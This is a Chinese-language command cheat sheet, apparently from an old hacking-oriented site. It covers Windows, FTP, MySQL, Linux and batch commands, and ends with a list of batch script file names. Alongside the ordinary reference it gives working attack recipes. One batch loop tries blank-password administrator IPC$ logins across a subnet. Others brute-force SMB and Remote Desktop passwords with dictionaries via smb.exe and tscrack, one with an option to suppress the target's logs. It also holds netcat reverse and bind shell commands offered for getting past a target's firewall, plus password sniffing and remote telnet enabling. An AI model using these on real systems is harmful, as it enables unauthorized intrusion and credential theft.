暂停批处理程序,并显示出:请按任意键继续....    if 在批处理程序中执行条件处理(更多说明见if命令及变量)    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)   for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置    echo 信息 在屏幕上显示出信息    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello    find 文件名 查找某文件    title 标题名字 更改CMD窗口标题名字    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )    ver 在DOS窗口下显示版本信息    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS,例:Format D: /FS:NTFS    md 目录名 创建目录    replace 源文件 要替换文件的目录 替换文件    ren 原文件名 新文件名 重命名文件名    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称    type 文件名 显示文本文件的内容    more 文件名 逐屏显示输出文件    doskey 要锁定的命令=字符    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=    taskmgr 调出任务管理器    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe   path 路径可执行文件的文件名 为可执行文件设置一个路径。    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;    regedit /e 注册表文件名 导出注册表    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。    cacls 文件名 查看文件的访问用户权限列表    REM 文本内容 在批处理文件中添加注解    netsh 查看或更改本地网络配置情况    IIS服务命令    iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)    iisreset /start或stop 启动(停止)所有Internet服务    iisreset /restart 停止然后重新启动所有Internet服务    iisreset /status 显示所有Internet服务状态    iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动    iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机   iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务    iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。    FTP 命令:(后面有详细说明内容)    ftp的命令行格式为:   ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。    -d 使用调试方式。    -n 限制ftp的自动登录,即不使用.netrc文件。    -g 取消全局文件名。    help [命令] 或 ?[命令] 查看命令说明    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.    pwd 列出当前远端主机目录    put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中    get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中    mget [remote-files] 从远端主机接收一批文件至本地主机    mput local-files 将本地主机中一批文件传送至远端主机    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件    ascii 设定以ASCII方式传送文件(缺省值)    bin 或 image 设定以二进制方式传送文件    bell 每完成一次文件传送,报警提示    cdup 返回上一级目录    close 中断与远程服务器的ftp会话(与open对应)    open host[port] 建立指定ftp服务器连接,可指定连接端口    delete 删除远端主机中的文件    mdelete [remote-files] 删除一批文件    mkdir directory-name 在远端主机中建立目录    rename [from] [to] 改变远端主机中的文件名    rmdir directory-name 删除远端主机中的目录    status 显示当前FTP的状态    system 显示远端主机系统类型    user user-name [password] [account] 重新以别的用户名登录远端主机    open host [port] 重新建立一个新的连接    prompt 交互提示模式    macdef 定义宏命令    lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   chmod 改变远端主机的文件权限    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母   cd remote-dir 进入远程主机目录    cdup 进入远程主机目录的父目录   ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip   #5    MYSQL 命令    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。   (例:mysql -h110.110.110.110 -Uroot -P123456   注:u与root可以不用加空格,其它也一样)    exit 退出MYSQL    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码    grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)   show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。   use mysql;    show tables; 显示库中的数据表    describe 表名; 显示数据表的结构    create database 库名; 建库   use 库名;    create table 表名 (字段设定列表); 建表    drop database 库名;    drop table 表名; 删库和删表    delete from 表名; 将表中记录清空    select * from 表名; 显示表中的记录    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。    win2003系统下新增命令(实用部份):    shutdown /参数 关闭或重启本地或远程主机。   参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。   例:shutdown /r /t 0 立即重启本地主机(无延时)   taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。   参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。   参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。    Linux系统下基本命令 注:要区分大小写    uname 显示版本信息(同win2K的 ver)    dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)   pwd 查询当前所在的目录位置   cd cd ..回到上一层目录,注意cd 与..之间有空格。 cd /返回到根目录。   cat 文件名 查看文件内容   cat >abc.txt 往abc.txt文件中写上内容。   more 文件名 以一页一页的方式显示一个文本文件。   cp 复制文件    mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录    mkdir 目录名 建立目录    rmdir 删除子目录,目录内没有文档。    chmod 设定档案或目录的存取权限    grep 在档案中查找字符串    diff 档案文件比较    find 档案搜寻    date 现在的日期、时间    who 查询目前和你使用同一台机器的人以及Login时间地点    w 查询目前上机者的详细资料    whoami 查看自己的帐号名称    groups 查看某人的Group    passwd 更改密码    history 查看自己下过的命令    ps 显示进程状态    kill 停止某进程    gcc 黑客通常用它来编译C语言写的文件    su 权限转换为指定使用者    telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。    ftp ftp连接上某服务器(同win2K)    批处理命令与变量    1:for命令及变量 基本格式    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。    批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2,user为%3    (set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开   command_parameters:为特定命令指定参数或命令行开关   IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。    用法举例:   @echo off   echo 用法格式:test.bat *.*.* > test.txt   for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt    存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。   /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。   @echo off   echo 用法格式:ok.bat ip   FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200   存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。    七:   2:if命令及变量 基本格式   IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。   例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。   0 指发现并成功执行(真);1 指没有发现、没执行(假)。   IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。   例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")   IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。   例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。   IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。当有del命令时需把del命令全部内容用括起来,因为del命令要单独一行时才能执行,用上后就等于是单独一行了;例如:“if exist test.txt. else echo test.txt.missing ”,注意命令中的“.”   系统外部命令   注:系统外部命令(均需下载相关工具)   瑞士军刀:nc.exe    参数说明:   -h 查看帮助信息   -d 后台模式   -e prog程序重定向,一但连接就执行[危险]   -i secs延时的间隔   -l 监听模式,用于入站连接   -L 监听模式,连接天闭后仍然继续监听,直到CTR+C   -n IP地址,不能用域名   -o film记录16进制的传输   -p[空格]端口 本地端口号   -r 随机本地及远程端口   -t 使用Telnet交互方式   -u UDP模式   -v 详细输出,用-vv将更详细   -w数字 timeout延时间隔   -z 将输入,输出关掉(用于扫锚时)   基本用法:   nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口   nc -l -p 80 开启本机的TCP 80端口并监听   nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口   nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口   nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口   高级用法:   nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止   nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt   nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   本机上用: nc -l -p 本机端口   在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K   nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙   本机上用:nc -d -l -p 本机端口 存放文件的路径及名称 传送文件到对方主机   备 注:   | 管道命令    重定向命令。“<;”,例如:tlntadmn > d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中   >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。   如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。   八:   扫描工具:xscan.exe   基本格式   xscan -host [-] [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息   xscan -file [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息   检测项目   -active 检测主机是否存活   -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)   -port 检测常用服务的端口状态   -ftp 检测FTP弱口令   -pub 检测FTP服务匿名用户写权限   -pop3 检测POP3-Server弱口令   -smtp 检测SMTP-Server漏洞   -sql 检测SQL-Server弱口令   -smb 检测NT-Server弱口令   -iis 检测IIS编码/解码漏洞   -cgi 检测CGI漏洞   -nasl 加载Nessus攻击脚本   -all 检测以上所有项目   其它选项   -i 适配器编号 设置网络适配器,可通过"-l"参数获取   -l 显示所有网络适配器   -v 显示详细扫描进度   -p 跳过没有响应的主机   -o 跳过没有检测到开放端口的主机   -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量,默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)   用法示例   xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机   xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机   xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机   九:   命令行方式嗅探器: xsniff.exe   可捕获局域网内FTP/SMTP/POP3/HTTP协议密码   参数说明   -tcp 输出TCP数据报   -udp 输出UDP数据报   -icmp 输出ICMP数据报   -pass 过滤密码信息   -hide 后台运行   -host 解析主机名   -addr IP地址 过滤IP地址   -port 端口 过滤端口   -log 文件名 将输出保存到文件   -asc 以ASCII形式输出   -hex 以16进制形式输出   用法示例   xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中   xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出   终端服务密码破解: tscrack.exe   参数说明   -h 显示使用帮助   -v 显示版本信息   -s 在屏幕上打出解密能力   -b 密码错误时发出的声音   -t 同是发出多个连接(多线程)   -N Prevent System Log entries on targeted server   -U 卸载移除tscrack组件   -f 使用-f后面的密码   -F 间隔时间(频率)   -l 使用-l后面的用户名   -w 使用-w后面的密码字典   -p 使用-p后面的密码   -D 登录主页面   用法示例   tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码   tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户   @if not exist ipcscan.txt goto noscan   @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i   Nscan   @echo 3389.txt no find or scan faild   (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)   3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat   @if not exist tscrack.exe goto noscan   @tscrack %1 -l administrator -w pass.dic >>rouji.txt   :noscan   @echo tscrack.exe no find or scan faild   (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)   hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。   其它   Shutdown.exe   Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)   fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)   fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时,他扫到的结果会完全是的主机信息   Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。   OpenTelnet.exe (远程开启telnet工具)   opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。   NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。   ResumeTelnet.exe (OpenTelnet附带的另一个工具)   resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。   FTP命令详解   FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。   FTP的命令行格式为:   ftp -v -d -i -n -g [主机名] ,其中   -v 显示远程服务器的所有响应信息   -n 限制ftp的自动登录,即不使用;.n etrc文件;   -d 使用调试方式;   -g 取消全局文件名。   FTP使用的内部命令如下(中括号表示可选项):   1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip   2.$ macro-ame[args]:执行宏定义macro-name。   3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。    4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。   5.ascii:使用ascii类型传输方式。   6.bell:每个命令执行完毕后计算机响铃一次。   7.bin:使用二进制文件传输方式。   8.bye:退出ftp会话过程。   9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。   10. cd remote-dir:进入远程主机目录。   11.cdup:进入远程主机目录的父目录。   12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。   13.close:中断与远程服务器的ftp会话(与open对应)。   14 .cr:使用asscii方式传输文件时,将回车换行转换为回行。   15.delete remote-file:删除远程主机文件。   16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。   17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。    18.disconnection:同close。   19.form format:将文件传输方式设置为format,缺省为file方式。   20.get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。   21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。   22.hash:每传输1024字节,显示一个hash符号(#)。   23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。    24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27. ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。    modtime file-name:显示远程主机文件的最后修改时间。 mput local-file:将多个文件传输至远程主机。 newer file-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。   38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。   39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。   40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。   41.open host[port]:建立指定ftp服务器连接,可指定连接端口。   42.passive:进入被动传输方式。   43.prompt:设置多个文件传输时的交互提示。   44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。   45.put local-file[remote-file]:将本地文件local-file传送至远程主机。   46.pwd:显示远程主机的当前工作目录。   47.quit:同bye,退出ftp会话。   48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.   49.recv remote-file[local-file]:同get。   50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。   51.rhelp[cmd-name]:请求获得远程主机的帮助。   52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。   53.rename[from][to]:更改远程主机文件名。   54.reset:清除回答队列。   55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。   56.rmdir dir-name:删除远程主机目录。   57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。   58.send local-file[remote-file]:同put。   59.sendport:设置PORT命令的使用。   60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。   61.size file-name:显示远程主机文件大小,如:site idle 7200。   62.status:显示当前ftp状态。   63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。   64.sunique:将远程主机文件名存储设置为只一(与runique对应)。   65.system:显示远程主机的操作系统类型。   66.tenex:将文件传输类型设置为TENEX机的所需的类型。   67.tick:设置传输时的字节计数器。   68.trace:设置包跟踪。   69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。   70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3   71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。   72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.   73.?[cmd]:同help.
98下获取当前路径.cmd cdd.cmd cmd.exe CMD加密.txt CMD命令速查手册.cmd config.ini C盘转换为NTFS格式.cmd date.txt debug生成取色按钮程序.bat debug生成取色按钮程序.cmd dir.bat dos下重启.bat Fjcyz.bat for.txt IE 界面批处理通讯录.cmd IE主页修改.bat IE修复.cmd install.CMD jacksi.bat list.ini lmod.com OptimizeXp.bat QQ精简.bat QQ精简.cmd readme.txt RUN.bat set.txt shell.bat SHELL.PIF Shell.reg svc2kxp.cmd svc2kxp深山红叶汉化版本.cmd sxs.exe 的查杀.bat sz.reg转换成reg.bat.bat un3721.bat un3721.reg USB.BAT WENJIAN.txt win2000关机命令.bat Windows安全优化小助手.cmd xp下确定最后的盘符.bat XP服务优化批处理.bat YS从桌面复制文件到其他地方.bat 一键清理系统垃圾文件.bat 下一行数字和上一行显示在同一行.cmd 不显示输入密码.cmd 不显示隐藏文件.bat 与某人的QQ临时对话.cmd 两整数相除的批处理.cmd 中文数字转换为阿拉伯数字.cmd 中文显示ping结果.bat 九九乘法表.cmd 九宫格图案.cmd 乱序重列某类文件.cmd 交换两个变量的值而不使用临时变量.bat 交换两个变量的值而不使用临时变量.cmd 人民币大小写互转程序.cmd 人民币金额小写转大写.cmd 今天访问过的程序文件所在目录.cmd 以文件夹名为名建立文本文件.cmd 使用WMI别名获取CPU信息.bat 使用说明.txt 保留空行替换字符串.cmd 修改IP跟电脑名.bat 全盘删除所有文件夹下的_desktop.ini.bat 全盘删除每个文件夹下的指定文件.cmd 全盘搜索指定文件.cmd 全盘查找QQ.exe并执行.cmd 全盘禁止运行指定程序.cmd 公交线路.txt 公交线路查询.bat 关闭IDE通道检测.bat 分离路径文件名.cmd 列举水产品最高&最低价记录.cmd 列举进程.bat 创建url格式的快捷方式.cmd 删除N天之前的文件.cmd 删除当前目录下及其子文件夹中所有的空文件夹.cmd 删除所有以数字命名的文件夹.cmd 删除指定文件夹之外的其他文件夹和文件.cmd 删除指定路径下指定文件及文件夹外的所有文件及文件夹2.bat 删除某些文件夹之外的目录.cmd 删除重复行.cmd 判断光驱是否可用.bat 判断光驱里有无光盘.bat 判断分区格式.bat 判断是文件还是文件夹.cmd 判断驱动器类型.cmd 刷新策略.bat 加密代码.cmd 勾股数算法.cmd 十进制转二进制.cmd 十进制转十六进制.cmd 去掉字符串不同部位的空格.cmd 去掉字符串头所有的0.cmd 去掉数值中可能存在的负号.cmd 去最大最小值后求剩余数组平均值.cmd 反序列出文本的每行内容.cmd 反序显示输入内容.cmd 取得硬盘数.bat 变色+翻滚字符.bat 变色+翻滚字符.cmd 变量截取实例.bat 变量的多级嵌套.bat 变量的多级嵌套.cmd 只修改年份的批处理.bat 右键添加bat.bat 右键添加打开MS-DOS.bat 在所有文件夹下建立随机文件.cmd 多行文本拼接成一行.cmd 娱乐进度条.bat 娱乐进度条.cmd 字母大小写转换.cmd 定时关机.cmd 对加密的代码进行解密处理.bat 对加密的代码进行解密处理.cmd 对含有数字的文件进行改名操作.cmd 对数字进行排序.cmd 局域网扫描批处理.txt 屏幕炸弹.bat 建立回收站.cmd 弹出对话框.bat 快速清理垃圾文件.bat 感情进度条.bat 感情进度条.cmd 打开控制面板中的某项.cmd 打开系统属性.cmd 批处理加密.bat 批处理生成图片.bat 批处理生成图片.cmd 批处理程序代码.rar 批处理解密.bat 批量改名.bat 批量文件CAB 打包工具.cmd 把一个数拆分为几个数的和.cmd 把指定文件中的指定位置的数字相加.cmd 把秒转换为天小时分秒的格式.cmd 把首行和尾行互换.cmd 抛弃路径尾部指定层次的字符串.cmd 拼接相临的奇偶行文本内容.cmd 指定图片路径换桌面.bat 按创建时间显示完整路径.cmd 按扩展名分类.bat 按软件分类建立文件夹.cmd 换桌面.bat 探测空文件夹.cmd 提取两个文件内容的不同之处.cmd 提取文件(夹)属性.cmd 提取用户列表.cmd 搞笑开机.bat 收集系统信息.cmd 改IP;网关;CDKey;网络号.cmd 改变我的文档路径.bat 改变我的文档路径到D盘.bat 改变窗口颜色并显示当前颜色代码.cmd 改名复制文件.cmd 文件备份器V2.3修改版2.cmd 文件夹伪装.TXT 文件归类整理器 V1.1(子目录版).bat 文件归类整理器 V1.1(指定路径带子目录版).bat 文件归类整理器(当前目录版).bat 文件数目分类统计.cmd 断开网络联结.bat 无限制实数加减运算脚本.cmd 星光闪烁.bat 星光闪烁.cmd 显示c盘~z盘.bat 显示只有指定个数字符的行.cmd 显示各分区剩余空间情况.cmd 显示当面途径DIR.bat 显示所有分区的剩余空间(以MB为单位).cmd 显示本机用户帐号信息.cmd 显示某两个字符及其之间的字符.cmd 显示用户名.bat 显示磁盘分区数.cmd 显示网络配置.bat 显示翻滚字符.bat 显示进度.bat 显示进度.cmd 显示随机的5个数.cmd 显示隐藏文件.bat 更改电源管理方式.bat 更改盘符.bat 替换系统主题.cmd 最小化运行批处理.bat 最小化运行批处理.cmd 枚举当前目录及子目录大小.bat 枚举显示.bat 查找偶数行内容.cmd 查找最新的文件.bat 查找行中第一个数字串.cmd 查杀效果图.bat 查看工作组.bat 查看开机自启动程序的完整路径.cmd 查看用户是否存在.bat 查看电脑硬件信息.bat 查看进程使用的端口.bat 查看驱动器.bat 校对时间.cmd 检查网络信息.bat 检测IP格式是否正确.cmd 检测光驱中是否有盘.cmd 模拟2K开机进度条.bat 模拟2K开机进度条.cmd 模拟黑客帝国数码雨.bat 每6行拼接为一行.cmd 比较两个文件夹下文件名的异同.cmd 水仙花数算法.cmd 求一列数所有不同组合的和.cmd 求最大公约数和最小公倍数.cmd 注册右键.reg 测试网络是否通畅.cmd 添加环境变量.cmd 清空指定大小的文件夹.cmd 清除威金(logo_1,熊猫烧香)病毒最新变种工具.bat 清除熊猫内存病毒.bat 理解字符截取功能.cmd 生成0-99之间的随机数列.cmd 用指定字符替换指定内容.cmd 用某行内容替换特定字符.cmd 用随机数做四则运算.cmd 画圆角矩形框.cmd 百度关键字搜索.bat 百钱买百鸡的买法.cmd 禁止保留文档记录.bat 简介.txt 篮球飞人火爆版.cmd 系统补丁自动升级.cmd 系统补丁自动安装.cmd 结束进程.bat 给每个盘添加卷标.cmd 统计重复次数并排序.cmd 维护版.bat 网络PING包查询.bat 老外写的系统文件替换.cmd 老毛桃制作的 WinPE 专用安装工具.cmd 自动改回主页.bat 自定义配置网络ip、网关、dns.bat 英汉互译.bat 英汉互译.txt 获取当前目录名.cmd 获取指定层次的目录名.cmd 获取某路径下的所有文件名.cmd 获取相对路径.cmd 获取路径中指定层深的字符串.cmd 虚拟磁盘连接断开控制.bat 被锁定帐户.bat 解析ipconfig命令输出通用函数.cmd 解锁注册表.BAT 计算2的N次方.cmd 计算字符串长度.cmd 计算开方.cmd 计算正浮点数的和.cmd 计算花费的时间.cmd 词库.txt 词库格式举例.txt 读取带敏感字符的行.cmd 读心术P处理版.bat 读心术P处理版.cmd 